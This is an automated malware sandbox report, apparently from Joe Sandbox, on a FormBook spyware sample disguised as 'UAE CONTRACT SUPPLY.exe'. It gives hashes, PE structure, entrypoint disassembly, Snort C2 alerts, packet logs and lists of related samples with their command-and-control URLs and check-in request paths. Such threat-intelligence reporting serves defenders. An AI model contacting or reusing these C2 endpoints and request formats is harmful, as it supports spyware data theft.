                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@8/0@10/4
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 53% (good quality ratio 44%)
                                                        • Quality average: 66.4%
                                                        • Quality standard deviation: 35.8%
                                                        HCA Information:
                                                        • Successful, ratio: 61%
                                                        • Number of executed functions: 170
                                                        • Number of non-executed functions: 34
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.211.6.115, 104.43.139.144, 142.250.184.46, 51.104.139.180, 52.155.217.156, 20.54.26.129, 8.248.147.254, 67.27.233.254, 67.27.159.254, 8.248.143.254, 67.26.83.254, 51.103.5.159, 104.43.193.48, 92.122.213.194, 92.122.213.247, 2.17.179.193, 13.64.90.137, 184.30.20.56, 51.11.168.160
                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        No simulations

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        185.230.60.1022S6VUd960E.exeGet hashmaliciousBrowse
                                                        • www.thepoetrictedstudio.com/bw82/?JB4DY2=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHK6M8xRYK4Gq&w0G=jzuDZX7xC
                                                        34.102.136.18014079 Revised #PO 4990.exeGet hashmaliciousBrowse
                                                        • www.ubiqshop.com/suod/
                                                        twistercrypted.exeGet hashmaliciousBrowse
                                                        • www.whitley360insurancegroup.com/e3rp/?j8pPk=im8RK5hojyiovjoWpCByoAyExdKu9PCH/DHixFeIJgIWbd9/JUshX+E76zrtzOGwSvQG&iJ=yL3dpJexppT
                                                        dCoLEiYyx1.exeGet hashmaliciousBrowse
                                                        • www.wewantvote.com/hks/?S2Jdyv=JR-TT8a8bz4&o2=QYUxBxXkCeZVJNfFWSJsk3IBeYXPZgc2nH/dDvQY/XbZkPs+fhYBerosKyprHHiIEPgfedaFww==
                                                        GDJWHqItQO.exeGet hashmaliciousBrowse
                                                        • www.lesavonbyannvictoria.com/dyt/?w8l=2w8yK74E/w9lysTpUayEk1uIR8qyDanCFlUeVmIM4yvirp/OCQwAlXgQpx9jKZ5pn0hJ&Tj-=YvLpZ
                                                        Shipment Document BL,INV and packing list.exeGet hashmaliciousBrowse
                                                        • www.parkcitysongfest.com/nehc/?Jnz=9rSpeXq0adO&yrsDIlWx=LMAhfecU0y34Tx1TbWeWAS4HEN0+4+sZND0z+5CMXKz3uB8Td4f40r/k+tJO9eUuw3oDNFlv+g==
                                                        PO_210224.exeGet hashmaliciousBrowse
                                                        • www.jeetinternationalgroup.com/kbc/?mlvx=rTYX5btw1iIIHoMYt3wFv5EHXrCgun0pSs+f973Cl/VGhbEqDDvdvpBnQB7WKQvfWEf2&Ntilqd=8p4pqfAhA
                                                        2021_02_25.exeGet hashmaliciousBrowse
                                                        • www.bistrolartichaut.com/gbr/?kDHl=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIdVdDj4pEKFF2KGGA==&Kzr4=SnjtLZExJt
                                                        55gfganfgF.exeGet hashmaliciousBrowse
                                                        • www.gdsjgf.com/bw82/?_FQl2b=7KG5rMnJQVi61jAewyvwq06b8xrmRTVdiDIOhf904IMqwa5VOrK6tjTZXZHtOEFX/CqJe2Vx/Q==&oX9=Z0D4XL4pfLe8-hP
                                                        yrsTO0ER4V.exeGet hashmaliciousBrowse
                                                        • www.bitcoinrewardsu.info/kre/?YvBxMNmh=kQkeQIpKJNb6oOxJN4GJfD6t5KY2AsRnmRWhQl1X7YIrKxWbjtaZnp5PaacD5HNrGJbroy9C/A==&_jATiR=UfdDO4MxCVo
                                                        RQP_10378065.exeGet hashmaliciousBrowse
                                                        • www.ikescakes.com/mt6e/?mtxhc=YvExCURCHojWxUZ2uMbCTZtdlUfUNESptwc+9N4MwoafLt15MUIAAry7fUZG5aHTuU8f+mfXxQ==&rVXHzf=lnRpL0YpGPdD
                                                        Price quotation.exeGet hashmaliciousBrowse
                                                        • www.womenreadytomove.com/uidr/?pRrXnjX=+yHJuk7akGgRjMzjPF0aFAvqX/p+12T9a3qHSG6UxUVEi0VJLVtNHRJTw/YZCKaLJ9IS&NtTD4P=XPjPRje8qFgxsfb
                                                        DHL Shipping Document_Pdf.exeGet hashmaliciousBrowse
                                                        • www.elementclubhouse.com/dll/?ArDDXx=WR3E3vwyc/GreSyJ7XmSowICMkI8sNumnp0OkvNXbOz2Qb0q9qTQClQxRjHoqSrBttUl&VnwDZ=-Z2hAFrpEtCxkjI
                                                        MT.Au Leo V.1420.xlsxGet hashmaliciousBrowse
                                                        • www.hakimkhawatmi.com/nsag/?jv84=9Tl2KXc7hN/2U9N9+vpX/czO0Yy7ZBOWuVeFqMNCcJII52Iatjzlz6fsfLitv4s31iy/dQ==&1bCd=jpXpdpDpF
                                                        dwg.exeGet hashmaliciousBrowse
                                                        • www.kreatelymedia.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ
                                                        orders.exeGet hashmaliciousBrowse
                                                        • www.suncobrayoga.com/ni6e/?W6=+pZLjlAoRu3DtzXq35lSkEUB/ZsZHJe08VokdK2HVDHLsmWw5RNCvrmnDtoZrYQiiN4bm+0CXw==&UlPt=GVoxsVvHVpd8Sl
                                                        Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                                        • www.hk-attorneys.com/uqf5/?Y4pXFx5x=Dg97rDlyoxn6rzyVbv3B7zG329WThiiFJjF/QU5oHVDRmmZSVK6c1XVEPf5rJpTqyNbYXr1Rqw==&BR-=UTjHnDN0Jp9hlD
                                                        9VZe9OnL4V.exeGet hashmaliciousBrowse
                                                        • www.vio-lence-official.com/mjs/?ohoDP=Szrhs8&EzrxBfhH=Km50rYfCIMLkr6cNBQUAIfaJzg7DBzOfrqOCbjSFoXRiVQSa2PRHXyZRZ9uV6+yeKg7N
                                                        3zutY8IPBS.exeGet hashmaliciousBrowse
                                                        • www.chapelcouture.com/ffw/?uZCX=XPjPaXeHqZ5XiDl&Jzr8URRX=Q3EGYcSU8t2GK6ftjW66hePdz5cilHQXw0NtnM1D8Yj3A1BwaX/+ESmEZzWdZeCCWyTt
                                                        IKtgCGdzlg.exeGet hashmaliciousBrowse
                                                        • www.srcsvcs.com/bw82/?9rjHF6y=idg9JX97F3eVuJ82V/BLVAmaLrIGTHqm4FsH2lIA1Y64HTHcmGyQxV9x71/09hThPInxOEDyHA==&lX9d=p48hVnrp1tqPRT7P
                                                        U6RI0SDRS2.exeGet hashmaliciousBrowse
                                                        • www.wholesalerbargains.com/nsag/?GVgT1=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU4mnryJvfB01hf9UaA==&6l=SlSp

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        googlehosted.l.googleusercontent.comBL.htmlGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        caraganas.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        #U266b VM_540283.htmGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        _vm54959395930.htmGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        Malone3388_001.htmGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        dgaTCZovz.msiGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        2021-Nieuwepayroll-Aanpassing.htmlGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        seed.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        PO112000891122110.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        xerox for hycite.htmGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        Muligheds.exeGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        2021-Nouvelle masse salariale-Rapport.htmlGet hashmaliciousBrowse
                                                        • 216.58.209.33
                                                        SOLICITUD DE HERJIMAR, SL (HJM-745022821).exeGet hashmaliciousBrowse
                                                        • 216.58.208.161
                                                        #U6211#U662f#U56fe#U7247.exeGet hashmaliciousBrowse
                                                        • 216.58.208.161
                                                        OneNote rmos@dataflex-int.com.htmlGet hashmaliciousBrowse
                                                        • 216.58.208.129
                                                        Sponsor A Child, Best Online Donation Site, Top NGO - World Vision India.htmlGet hashmaliciousBrowse
                                                        • 172.217.20.225
                                                        barcelona-v-psg-liv-uefa-2021.htmlGet hashmaliciousBrowse
                                                        • 172.217.20.225
                                                        Barcelona-v-PSG-0tv.htmlGet hashmaliciousBrowse
                                                        • 172.217.20.225
                                                        CONSTRUCCIONES SAN MART#U00cdN, S.A. SOLICITAR. (SMT-14517022021).exeGet hashmaliciousBrowse
                                                        • 172.217.20.225
                                                        td-balancer-dc11-60-102.wixdns.net2S6VUd960E.exeGet hashmaliciousBrowse
                                                        • 185.230.60.102

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        WIX_COMILNEW ORDER - VOLVO HK HKPO2102-13561,pdf.exeGet hashmaliciousBrowse
                                                        • 185.230.60.177
                                                        2S6VUd960E.exeGet hashmaliciousBrowse
                                                        • 185.230.60.102
                                                        https://alijafari6.wixsite.com/owa-projection-aspxGet hashmaliciousBrowse
                                                        • 185.230.61.98
                                                        https://xmailexpact.wixsite.com/mysiteGet hashmaliciousBrowse
                                                        • 185.230.61.179
                                                        http://vcomdesign.comGet hashmaliciousBrowse
                                                        • 185.230.61.180
                                                        https://samson442.wixsite.com/outlook-webGet hashmaliciousBrowse
                                                        • 185.230.60.197
                                                        http://tecasi.rs/tree/?email=adsdkljfds.sadkf@asdkg.comGet hashmaliciousBrowse
                                                        • 185.230.60.163
                                                        https://infozapyt.wixsite.com/mysiteGet hashmaliciousBrowse
                                                        • 185.230.60.179
                                                        https://brechi5.wixsite.com/owa-webmail-updatesGet hashmaliciousBrowse
                                                        • 185.230.61.179
                                                        Swift Copy.exeGet hashmaliciousBrowse
                                                        • 185.230.61.96
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.180
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.168
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.168
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.101
                                                        MOI Support ship V2.docxGet hashmaliciousBrowse
                                                        • 185.230.61.180
                                                        https://imsva91-ctp.trendmicro.com/wis/clicktime/v1/query?url=http%3a%2f%2ftecasi.rs%2fPAF&umid=EF9759F9-B31F-8705-A867-F303FCD5E066&auth=25994e11723456f59f881b7e4162635112e7401d-23077e0b296f1a694cd81697d46ee85967e5556eGet hashmaliciousBrowse
                                                        • 185.230.60.180
                                                        https://outlookonedriveupd.wixsite.com/officeGet hashmaliciousBrowse
                                                        • 185.230.60.98
                                                        https://ademkeskin.wixsite.com/owa-projection-aspxGet hashmaliciousBrowse
                                                        • 185.230.61.163
                                                        https://outlookmicrosoftwo.wixsite.com/upgradeGet hashmaliciousBrowse
                                                        • 185.230.60.98
                                                        https://www.shutdown-turnaround-industry-network.com/unsubscribeGet hashmaliciousBrowse
                                                        • 185.230.60.177
                                                        GOOGLEUS14079 Revised #PO 4990.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        twistercrypted.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        Tide_v2.49.0_www.9apps.com_.apkGet hashmaliciousBrowse
                                                        • 142.250.184.74
                                                        tuOAqyHVuH.exeGet hashmaliciousBrowse
                                                        • 35.228.227.140
                                                        WB4L25Jv37.exeGet hashmaliciousBrowse
                                                        • 35.228.227.140
                                                        Tide_v2.49.0_www.9apps.com_.apkGet hashmaliciousBrowse
                                                        • 142.250.186.106
                                                        BL.htmlGet hashmaliciousBrowse
                                                        • 142.250.186.33
                                                        PrebuiltGmsCore.apkGet hashmaliciousBrowse
                                                        • 172.217.16.142
                                                        PrebuiltGmsCore.apkGet hashmaliciousBrowse
                                                        • 142.250.186.138
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 142.250.186.66
                                                        dCoLEiYyx1.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        GDJWHqItQO.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 142.250.186.66
                                                        2o0y7CvHF2.exeGet hashmaliciousBrowse
                                                        • 35.187.82.108
                                                        C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                        • 142.250.186.66
                                                        kBJlVQuchM.exeGet hashmaliciousBrowse
                                                        • 216.239.32.21
                                                        RODFm7tAfQ.exeGet hashmaliciousBrowse
                                                        • 35.228.227.140
                                                        zk8Jq3gpa5.exeGet hashmaliciousBrowse
                                                        • 35.228.227.140
                                                        Shipment Document BL,INV and packing list.exeGet hashmaliciousBrowse
                                                        • 34.102.136.180
                                                        rtofwqxq.exeGet hashmaliciousBrowse
                                                        • 216.58.212.131

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        37f463bf4616ecd445d4a1937da06e19CustomerStatement.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Payment.htmlGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        EmployeeAnnualReport.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Customer Statement.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Remittance advice.htmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Customer Statement.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Order-10236587458.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        RFQ_110199282773666355627277288.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        EMG 3.0.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        QUOTATION.xlsxGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        VM_629904-26374.htmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        cm0Ubgm8Eu.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        caraganas.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Notification 466022.xlsmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Fax #136.xlsmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Purchase Order22420.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        ceFlxYfe4F.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Fatura.exeGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        Reports #176.xlsmGet hashmaliciousBrowse
                                                        • 142.250.184.65
                                                        SecuriteInfo.com.VB.Heur2.EmoDldr.5.B611173F.Gen.18420.xlsmGet hashmaliciousBrowse
                                                        • 142.250.184.65

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):4.293725930665568
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.15%
                                                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:UAE CONTRACT SUPPLY.exe
                                                        File size:458752
                                                        MD5:9da74a6d583c801677c0e2fde51586ba
                                                        SHA1:e1af77b99ca69e4737fa4d73a77e5702d5c13e91
                                                        SHA256:9d295dd246f6844b1bfe945cdf914a1615d0dacd9aa9f40d1276bc75f796268c
                                                        SHA512:d3bc9d90d2ce4945bc4cf3d8108272f88bd24e7bc12de99c5a3a36043a4728b2865f97d64c59bc9fcb9f80cd5c87e33cad5d0b3b8157a54591b85cdcf0a16328
                                                        SSDEEP:1536:3bLxrsc45V0M8wBEzkXZ8RuMI8sFjE2ik+W65tikWmBaHHG7:LLTSuMBezkUu8WjE2Z+DtikWmBaHHG7
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L.....!Z.................0..........H........@....@

                                                        File Icon

                                                        Icon Hash:e886a37159aadcf8

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x401348
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x5A21D1E1 [Fri Dec 1 22:04:17 2017 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce

                                                        Entrypoint Preview

                                                        Instruction
                                                        push 00404264h
                                                        call 00007F29048150D5h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        cmp byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        and ah, bl
                                                        sub byte ptr [edx+42BA4D36h], FFFFFF8Eh
                                                        arpl word ptr [edi-2A28310Fh], si
                                                        rol byte ptr [eax], cl
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [edx+00h], al
                                                        push es
                                                        push eax
                                                        add dword ptr [ecx], 54h
                                                        jc 00007F2904815147h
                                                        add byte ptr fs:[eax], bl
                                                        add eax, dword ptr [eax]
                                                        add byte ptr [eax], al
                                                        add bh, bh
                                                        int3
                                                        xor dword ptr [eax], eax
                                                        and byte ptr [esi-01h], ah
                                                        retn 7379h
                                                        mov esp, 70824472h
                                                        add eax, E95CAFBAh
                                                        mov eax, 96D22F46h
                                                        test al, 21h
                                                        fild word ptr [esi-7Bh]
                                                        mov eax, ebx
                                                        xor eax, BEEDD1D0h
                                                        cmp cl, byte ptr [edi-53h]
                                                        xor ebx, dword ptr [ecx-48EE309Ah]
                                                        or al, 00h
                                                        stosb
                                                        add byte ptr [eax-2Dh], ah
                                                        xchg eax, ebx
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add ch, byte ptr [esi]
                                                        add byte ptr [eax], al
                                                        out dx, al
                                                        daa
                                                        add byte ptr [eax], al
                                                        add byte ptr [6D6F4C00h], cl
                                                        insd
                                                        insb
                                                        jns 00007F2904815149h
                                                        je 00007F2904815147h
                                                        jc 00007F2904815150h
                                                        add byte ptr [4D000901h], cl
                                                        outsb
                                                        insd
                                                        imul esp, dword ptr [ebx+74h], 00006E65h

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x137140x3c.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x5aa64.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x30
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000xd8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x12b240x13000False0.444464432566data6.20247491398IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .data0x140000x19cc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x160000x5aa640x5b000False0.0544755537431data3.57347405525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x161d80x42028data
                                                        RT_ICON0x582000x468GLS_BINARY_LSB_FIRST
                                                        RT_ICON0x586680x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                        RT_ICON0x5ac100x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                        RT_ICON0x5bcb80x10828dBase III DBT, version number 0, next free block index 40
                                                        RT_ICON0x6c4e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                        RT_GROUP_ICON0x707080x5adata
                                                        RT_VERSION0x707640x300dataChineseChina

                                                        Imports

                                                        DLLImport
                                                        USER32.DLLHideCaret
                                                        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0804 0x04b0
                                                        LegalCopyrightInternal Verify Number,88
                                                        InternalNameVrdihftetgo6
                                                        FileVersion1.00
                                                        CompanyNameInternal Verify Number,88
                                                        LegalTrademarksInternal Verify Number,88
                                                        ProductNameTred6
                                                        ProductVersion1.00
                                                        OriginalFilenameVrdihftetgo6.exe

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        ChineseChina

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        02/25/21-15:28:20.874775TCP1201ATTACK-RESPONSES 403 Forbidden804975134.102.136.180192.168.2.6
                                                        02/25/21-15:28:31.319640TCP1201ATTACK-RESPONSES 403 Forbidden804975234.102.136.180192.168.2.6
                                                        02/25/21-15:28:36.463718TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6104.21.32.11
                                                        02/25/21-15:28:36.463718TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6104.21.32.11
                                                        02/25/21-15:28:36.463718TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6104.21.32.11
                                                        02/25/21-15:28:57.410074TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.634.102.136.180
                                                        02/25/21-15:28:57.410074TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.634.102.136.180
                                                        02/25/21-15:28:57.410074TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.634.102.136.180
                                                        02/25/21-15:28:57.549735TCP1201ATTACK-RESPONSES 403 Forbidden804975634.102.136.180192.168.2.6

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 25, 2021 15:27:34.845195055 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:34.902072906 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.902928114 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:34.902947903 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:34.960144997 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.976227045 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.976279020 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.976319075 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.976358891 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:34.977421999 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:34.977448940 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.010773897 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.067878962 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.067979097 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.069430113 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.130521059 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344265938 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344293118 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344309092 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344326019 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344342947 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.344396114 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.344425917 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.344432116 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.348267078 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.348299026 CET44349731142.250.184.65192.168.2.6
                                                        Feb 25, 2021 15:27:35.348428011 CET49731443192.168.2.6142.250.184.65
                                                        Feb 25, 2021 15:27:35.348448038 CET49731443192.168.2.6142.250.184.65
